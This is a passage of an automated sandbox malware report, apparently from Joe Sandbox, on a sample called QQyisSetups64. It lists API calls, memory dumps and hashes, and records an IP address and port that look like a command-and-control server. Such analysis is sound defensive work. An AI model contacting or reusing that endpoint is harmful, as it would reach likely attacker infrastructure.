                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02C82D4F
                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 02C82D59
                                                                                                                                                                                                                      • SetEvent.KERNEL32(00000001), ref: 02C82D63
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1486965892-0
                                                                                                                                                                                                                      • Opcode ID: d3940892d9e0adad8026f69c2506db9f71a5c152f2df3103f30244bb128282ca
                                                                                                                                                                                                                      • Instruction ID: 3096f0f6a651d6c2e15c6fd99428bb83ad3a915d19296a48e5a305d79687b6ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3940892d9e0adad8026f69c2506db9f71a5c152f2df3103f30244bb128282ca
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DF08C76540700ABC2209B54DC4DB5677B8BB89B51F504B09F68292680C7B0B904CBE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 02C86F31
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: __FF_MSGBANNER.LIBCMT ref: 02C86E9C
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: __NMSG_WRITE.LIBCMT ref: 02C86EA3
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86EC8
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02C86F66
                                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 02C86F80
                                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 02C86F91
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 615853336-0
                                                                                                                                                                                                                      • Opcode ID: 2d3f8164d5fcca68955db4c98dbc25dd2ae2304de413f105d4429e21e0a54b0c
                                                                                                                                                                                                                      • Instruction ID: 9484efe87c239bc30c1eba3b66be39e413c4bd6ea8c0532cc1dc93cfca87c747
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d3f8164d5fcca68955db4c98dbc25dd2ae2304de413f105d4429e21e0a54b0c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9F02871900109AAEF04FBA4D808BAEBBAFAB4171CF348019E408A6590DBB2CB45DF41
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0378316B
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03783183
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0378322F
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$ExchangeInterlocked
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4033114805-0
                                                                                                                                                                                                                      • Opcode ID: c9972a2c98bf936c6cba85e2e537b9e4dc2f0493dbd781c7a3319555dc11a8d9
                                                                                                                                                                                                                      • Instruction ID: bf0a7373889a5fdb2591322e91093f3adb3b34a8d2db6e99a63ead6a8fc29929
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9972a2c98bf936c6cba85e2e537b9e4dc2f0493dbd781c7a3319555dc11a8d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C31A078640A02DFE714EF69C884A66B3E9FF44B14B10C56DE81ACB615D731F842CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 037811E9
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 03781226
                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03781255
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                                                                      • Opcode ID: 9dca776b82701631fc4824af2b7afc641e8702b3b7753bbc820635a4262b4884
                                                                                                                                                                                                                      • Instruction ID: d73c0a789632f410615ec1536d6676f791cb160fdbcb78d928512ffbfb8ceafe
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dca776b82701631fc4824af2b7afc641e8702b3b7753bbc820635a4262b4884
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45218E71B40709ABDB14EFA9E845B6EBBF8EF84715F4085A9E849A2640E630A8108B40
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 02C811E9
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C81226
                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C81255
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                                                                      • Opcode ID: 47c8ffbd1eabab4a07809aa283b527b8c7ae6292caebe66c3a34285be6ce2299
                                                                                                                                                                                                                      • Instruction ID: 78bcbd0ea851dac55e34e3ddf844db45c22bad47f967d7567ed2c9b6c429438d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47c8ffbd1eabab4a07809aa283b527b8c7ae6292caebe66c3a34285be6ce2299
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2621C270E403099BDB14AFA9DC45B6EF7F4EF40709F00C5ADE849E2640E670A9108B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 0378112F
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0378115F
                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 03781192
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                                                                      • Opcode ID: e5fcc5941d541abdbd5c0f9921bcd073ed2427f96b6f5f68def17a0c68ddce4a
                                                                                                                                                                                                                      • Instruction ID: f9db70ed16c0486cd6708483f687b76d5a03c79d719c94a0ec507fb0e6ba126c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5fcc5941d541abdbd5c0f9921bcd073ed2427f96b6f5f68def17a0c68ddce4a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB11B670E40708AFDB10EFA9DC85B6EFBF8FF44705F4085A9ED59E2240E674A9508B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __floor_pentium4.LIBCMT ref: 02C8112F
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02C8115F
                                                                                                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02C81192
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2605973128-0
                                                                                                                                                                                                                      • Opcode ID: 7954c4c11b7ad71da337f5877bc6229a0a2c336782aa74ba051908a688d761bf
                                                                                                                                                                                                                      • Instruction ID: 2ef1ad0861f783b863b8c1de0bc89e7d6698da96a9ce84a5b6b4c8b419ac08a9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7954c4c11b7ad71da337f5877bc6229a0a2c336782aa74ba051908a688d761bf
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 02119670E40705ABDB109FA9DC85B6EF7F8FF04709F008969E959D2240E770A9548754
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03789E04
                                                                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(?), ref: 03789E18
                                                                                                                                                                                                                      • GdipDisposeImage.GDIPLUS(?), ref: 03789E3B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 800915452-0
                                                                                                                                                                                                                      • Opcode ID: 03a7db1b69f30ac8419c0aead1fc48abc5f1bf47dbe5ffa529b72ee0877b4968
                                                                                                                                                                                                                      • Instruction ID: 64714352a052f90e70cebf09bef2a4539003fbfccf8cefb7bb406ccc1522101a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03a7db1b69f30ac8419c0aead1fc48abc5f1bf47dbe5ffa529b72ee0877b4968
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7F0A472900219E78B10FF94D8448EEFBB8EF4A711B00855AFD05AB340D7344B05CBD1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(037AFB64), ref: 03789ADC
                                                                                                                                                                                                                      • GdiplusStartup.GDIPLUS(037AFB60,?,?), ref: 03789B15
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(037AFB64), ref: 03789B26
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 389129658-0
                                                                                                                                                                                                                      • Opcode ID: a86f652b8a9e8d047ea55b175b5a3fe248b84d1f731353886f63929a4f0843f8
                                                                                                                                                                                                                      • Instruction ID: 66c99c07b3cc532f20147346e92cb15f3d44732a1ab5e4659d27952f2178de53
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a86f652b8a9e8d047ea55b175b5a3fe248b84d1f731353886f63929a4f0843f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F06D71A816099FDB50EFE9E86A7FABBF8F785305F404299D90452181D7BA0148CFA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                      • String ID: 118.107.44.219$19091
                                                                                                                                                                                                                      • API String ID: 3472027048-838246116
                                                                                                                                                                                                                      • Opcode ID: 497427054d4e2858a78d4be213b3831ed9dba2d9b5e7dbb3f2e26dcec8dc8c4f
                                                                                                                                                                                                                      • Instruction ID: 7661883f1841f6a236055a450f335e9903bc5b67ec07453f9aa36238473c2787
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 497427054d4e2858a78d4be213b3831ed9dba2d9b5e7dbb3f2e26dcec8dc8c4f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFD023B0654122977E14E601D468536B375BF8479C3544618E44343140D2B47C08DA95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 0378F969
                                                                                                                                                                                                                        • Part of subcall function 03793DE2: GetLastError.KERNEL32(00000001,00000000,0378F920,0378F6FC,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 03793DE6
                                                                                                                                                                                                                        • Part of subcall function 03793DE2: ___set_flsgetvalue.LIBCMT ref: 03793DF4
                                                                                                                                                                                                                        • Part of subcall function 03793DE2: __calloc_crt.LIBCMT ref: 03793E08
                                                                                                                                                                                                                        • Part of subcall function 03793DE2: DecodePointer.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793E22
                                                                                                                                                                                                                        • Part of subcall function 03793DE2: GetCurrentThreadId.KERNEL32 ref: 03793E38
                                                                                                                                                                                                                        • Part of subcall function 03793DE2: SetLastError.KERNEL32(00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76,00000000,00000000,?,03793F06), ref: 03793E50
                                                                                                                                                                                                                      • __freeptd.LIBCMT ref: 0378F973
                                                                                                                                                                                                                        • Part of subcall function 03793FA6: TlsGetValue.KERNEL32(?,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793FC7
                                                                                                                                                                                                                        • Part of subcall function 03793FA6: TlsGetValue.KERNEL32(?,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793FD9
                                                                                                                                                                                                                        • Part of subcall function 03793FA6: DecodePointer.KERNEL32(00000000,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 03793FEF
                                                                                                                                                                                                                        • Part of subcall function 03793FA6: __freefls@4.LIBCMT ref: 03793FFA
                                                                                                                                                                                                                        • Part of subcall function 03793FA6: TlsSetValue.KERNEL32(00000027,00000000,?,037910F0,00000000,037A6278,00000008,03791155,?,?,?,037A6298,0000000C,03791210,?), ref: 0379400C
                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 0378F97C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4224061863-0
                                                                                                                                                                                                                      • Opcode ID: 5b03631e192e852c6f6c3ad1ff07de2962767338b49bad860eb854dcf930ebe8
                                                                                                                                                                                                                      • Instruction ID: 2eeb4242e780f8e95af189d861406b64e0321038cf069813b72932172fba1eaa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b03631e192e852c6f6c3ad1ff07de2962767338b49bad860eb854dcf930ebe8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8C08C280047087BBF247B31A80C90A3B1D8DC02107140211E804C9040EE24DC018090
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 02C8715B
                                                                                                                                                                                                                        • Part of subcall function 02C89896: GetLastError.KERNEL32(00000001,00000000,02C87112,02C86F0C,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C8989A
                                                                                                                                                                                                                        • Part of subcall function 02C89896: ___set_flsgetvalue.LIBCMT ref: 02C898A8
                                                                                                                                                                                                                        • Part of subcall function 02C89896: __calloc_crt.LIBCMT ref: 02C898BC
                                                                                                                                                                                                                        • Part of subcall function 02C89896: DecodePointer.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C898D6
                                                                                                                                                                                                                        • Part of subcall function 02C89896: GetCurrentThreadId.KERNEL32 ref: 02C898EC
                                                                                                                                                                                                                        • Part of subcall function 02C89896: SetLastError.KERNEL32(00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F,00000000,00000000,?,02C899BA), ref: 02C89904
                                                                                                                                                                                                                      • __freeptd.LIBCMT ref: 02C87165
                                                                                                                                                                                                                        • Part of subcall function 02C89A58: TlsGetValue.KERNEL32(?,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89A79
                                                                                                                                                                                                                        • Part of subcall function 02C89A58: TlsGetValue.KERNEL32(?,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89A8B
                                                                                                                                                                                                                        • Part of subcall function 02C89A58: DecodePointer.KERNEL32(00000000,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89AA1
                                                                                                                                                                                                                        • Part of subcall function 02C89A58: __freefls@4.LIBCMT ref: 02C89AAC
                                                                                                                                                                                                                        • Part of subcall function 02C89A58: TlsSetValue.KERNEL32(00000025,00000000,?,02C87711,00000000,02C97B60,00000008,02C87776,?,?,?,02C97B80,0000000C,02C87831,?), ref: 02C89ABE
                                                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 02C8716E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4224061863-0
                                                                                                                                                                                                                      • Opcode ID: 0c748f147904787b2aaa276780b73dafb9ffc48ca3682bbc986f73b06ba0ec4e
                                                                                                                                                                                                                      • Instruction ID: f07521c5b40a65f4d87cf2d526b7a174ca7201625d80ee004e57b73ddaeb48e4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c748f147904787b2aaa276780b73dafb9ffc48ca3682bbc986f73b06ba0ec4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08C08C205402482A8A1037728C0C96A3A5E8E8034CFA08410B80881200EE30E8009950
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0360022B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                      • Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                                                                                                                      • Instruction ID: aa82584c3a98ca59c00ac9674a5f0f98e61f5cd17128210f4cc7cf7b70007b96
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2A15D70A00606EFCB19CFA9C981BAEB7B5FF48304B1881A9E415DB391D770EA51CB94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time_memmovetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1463837790-0
                                                                                                                                                                                                                      • Opcode ID: 89a869c58eb65be31f4a728b386371bc5d0563a6e53532d7067e3b501e0a509b
                                                                                                                                                                                                                      • Instruction ID: 7381a733e8f6f08a92a8cde3577795e42b5905cfdcab25a9693aa7a83e163673
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89a869c58eb65be31f4a728b386371bc5d0563a6e53532d7067e3b501e0a509b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6951D17E7406059FE711EF6DC8C4A7AB7A9BF48610718866CE91E8BB00DB30F841CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
